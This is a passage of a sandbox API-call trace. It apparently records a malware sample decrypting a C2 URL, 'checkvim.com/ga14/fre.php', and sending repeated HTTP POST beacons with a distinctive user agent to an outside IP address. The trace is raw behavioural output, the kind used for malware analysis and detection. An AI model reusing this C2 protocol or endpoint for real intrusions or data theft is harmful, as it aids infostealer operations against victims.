(lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.147] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0229.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.153] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0229.165] GetProcessHeap () returned 0x840000 [0229.165] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0229.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.166] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e670) returned 1 [0229.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.167] CryptSetKeyParam (hKey=0x87e670, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0229.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.168] CryptSetKeyParam (hKey=0x87e670, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.168] GetProcessHeap () returned 0x840000 [0229.168] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0229.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.169] CryptDecrypt (in: hKey=0x87e670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0229.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.170] CryptDestroyKey (hKey=0x87e670) returned 1 [0229.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.172] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0229.172] GetProcessHeap () returned 0x840000 [0229.172] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0229.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.173] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0229.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.174] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0229.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.175] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0229.175] GetProcessHeap () returned 0x840000 [0229.175] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0229.175] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0229.179] GetProcessHeap () returned 0x840000 [0229.179] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b58 [0229.179] socket (af=2, type=1, protocol=6) returned 0x304 [0229.179] connect (s=0x304, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0229.248] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0229.248] GetProcessHeap () returned 0x840000 [0229.248] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0229.248] GetProcessHeap () returned 0x840000 [0229.248] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0229.249] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0229.250] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0229.250] GetProcessHeap () returned 0x840000 [0229.250] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0229.250] GetProcessHeap () returned 0x840000 [0229.250] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0229.250] GetProcessHeap () returned 0x840000 [0229.250] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb90 [0229.250] GetProcessHeap () returned 0x840000 [0229.250] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0229.251] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0229.252] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0229.252] GetProcessHeap () returned 0x840000 [0229.252] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0229.252] GetProcessHeap () returned 0x840000 [0229.252] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0229.252] send (s=0x304, buf=0x873a58*, len=237, flags=0) returned 237 [0229.252] send (s=0x304, buf=0x87eb58*, len=159, flags=0) returned 159 [0229.253] GetProcessHeap () returned 0x840000 [0229.253] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0229.253] recv (in: s=0x304, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0229.626] GetProcessHeap () returned 0x840000 [0229.626] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0229.627] GetProcessHeap () returned 0x840000 [0229.627] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0229.627] GetProcessHeap () returned 0x840000 [0229.627] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0229.627] GetProcessHeap () returned 0x840000 [0229.627] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0229.627] closesocket (s=0x304) returned 0 [0229.628] GetProcessHeap () returned 0x840000 [0229.628] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b58 | out: hHeap=0x840000) returned 1 [0229.628] GetProcessHeap () returned 0x840000 [0229.628] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0229.628] GetProcessHeap () returned 0x840000 [0229.628] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0229.628] GetProcessHeap () returned 0x840000 [0229.628] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0229.633] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x758) returned 0x304 [0229.667] Sleep (dwMilliseconds=0xea60) [0229.702] GetProcessHeap () returned 0x840000 [0229.702] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0229.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.704] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0229.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.734] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0229.744] GetProcessHeap () returned 0x840000 [0229.744] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0229.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.745] CryptImportKey (in: hProv=0x86ff90, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0229.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.746] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0229.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.753] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.753] GetProcessHeap () returned 0x840000 [0229.753] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0229.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.754] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0229.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.755] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0229.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.756] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0229.756] GetProcessHeap () returned 0x840000 [0229.756] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0229.756] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.757] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0229.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.758] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0229.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.759] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0229.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.759] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0229.759] GetProcessHeap () returned 0x840000 [0229.760] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0229.760] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0229.760] GetProcessHeap () returned 0x840000 [0229.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0229.760] GetProcessHeap () returned 0x840000 [0229.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0229.760] GetProcessHeap () returned 0x840000 [0229.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0229.760] GetProcessHeap () returned 0x840000 [0229.760] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa70 [0229.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.761] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0229.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.768] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f798) returned 1 [0229.774] GetProcessHeap () returned 0x840000 [0229.774] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0229.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.775] CryptImportKey (in: hProv=0x86f798, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e970) returned 1 [0229.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.776] CryptSetKeyParam (hKey=0x87e970, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0229.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.779] CryptSetKeyParam (hKey=0x87e970, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.779] GetProcessHeap () returned 0x840000 [0229.779] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0229.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.780] CryptDecrypt (in: hKey=0x87e970, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa70, pdwDataLen=0x19f9a4 | out: pbData=0x87fa70, pdwDataLen=0x19f9a4) returned 1 [0229.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.783] CryptDestroyKey (hKey=0x87e970) returned 1 [0229.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.784] CryptReleaseContext (hProv=0x86f798, dwFlags=0x0) returned 1 [0229.784] GetProcessHeap () returned 0x840000 [0229.784] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0229.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.785] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0229.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.787] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0229.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.788] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0229.788] GetProcessHeap () returned 0x840000 [0229.788] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0229.788] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8714e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0229.790] GetProcessHeap () returned 0x840000 [0229.790] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c58 [0229.790] socket (af=2, type=1, protocol=6) returned 0x308 [0229.791] connect (s=0x308, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0229.861] FreeAddrInfoW (pAddrInfo=0x8714e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0229.861] GetProcessHeap () returned 0x840000 [0229.861] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0229.861] GetProcessHeap () returned 0x840000 [0229.861] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0229.862] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0229.863] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0229.863] GetProcessHeap () returned 0x840000 [0229.863] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0229.863] GetProcessHeap () returned 0x840000 [0229.863] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0229.863] GetProcessHeap () returned 0x840000 [0229.863] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb48 [0229.863] GetProcessHeap () returned 0x840000 [0229.863] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0229.864] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0229.865] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0229.865] GetProcessHeap () returned 0x840000 [0229.865] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0229.865] GetProcessHeap () returned 0x840000 [0229.865] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0229.865] send (s=0x308, buf=0x873a58*, len=237, flags=0) returned 237 [0229.866] send (s=0x308, buf=0x87eb58*, len=159, flags=0) returned 159 [0229.866] GetProcessHeap () returned 0x840000 [0229.866] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0229.866] recv (in: s=0x308, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0230.245] GetProcessHeap () returned 0x840000 [0230.246] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0230.246] GetProcessHeap () returned 0x840000 [0230.246] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0230.246] GetProcessHeap () returned 0x840000 [0230.246] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0230.246] GetProcessHeap () returned 0x840000 [0230.246] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0230.246] closesocket (s=0x308) returned 0 [0230.247] GetProcessHeap () returned 0x840000 [0230.247] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c58 | out: hHeap=0x840000) returned 1 [0230.247] GetProcessHeap () returned 0x840000 [0230.247] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0230.247] GetProcessHeap () returned 0x840000 [0230.247] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0230.247] GetProcessHeap () returned 0x840000 [0230.247] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0230.252] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xecc) returned 0x308 [0230.254] Sleep (dwMilliseconds=0xea60) [0230.255] GetProcessHeap () returned 0x840000 [0230.255] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0230.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.257] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0230.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.263] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0230.270] GetProcessHeap () returned 0x840000 [0230.270] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0230.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.271] CryptImportKey (in: hProv=0x86fce8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0230.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.271] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0230.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.273] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.273] GetProcessHeap () returned 0x840000 [0230.273] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0230.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.273] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0230.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.274] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0230.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.275] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0230.275] GetProcessHeap () returned 0x840000 [0230.275] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0230.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0230.276] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0230.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0230.277] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0230.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0230.702] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0230.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0230.703] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0230.703] GetProcessHeap () returned 0x840000 [0230.703] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871510 [0230.703] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0230.703] GetProcessHeap () returned 0x840000 [0230.703] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871510 | out: hHeap=0x840000) returned 1 [0230.703] GetProcessHeap () returned 0x840000 [0230.703] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0230.703] GetProcessHeap () returned 0x840000 [0230.703] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0230.703] GetProcessHeap () returned 0x840000 [0230.703] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fcf8 [0230.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.704] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0230.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.710] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0230.716] GetProcessHeap () returned 0x840000 [0230.716] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0230.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.717] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0230.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.717] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0230.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.718] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.719] GetProcessHeap () returned 0x840000 [0230.719] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0230.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.719] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fcf8, pdwDataLen=0x19f9a4 | out: pbData=0x87fcf8, pdwDataLen=0x19f9a4) returned 1 [0230.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.720] CryptDestroyKey (hKey=0x87e330) returned 1 [0230.721] LoadLibraryW 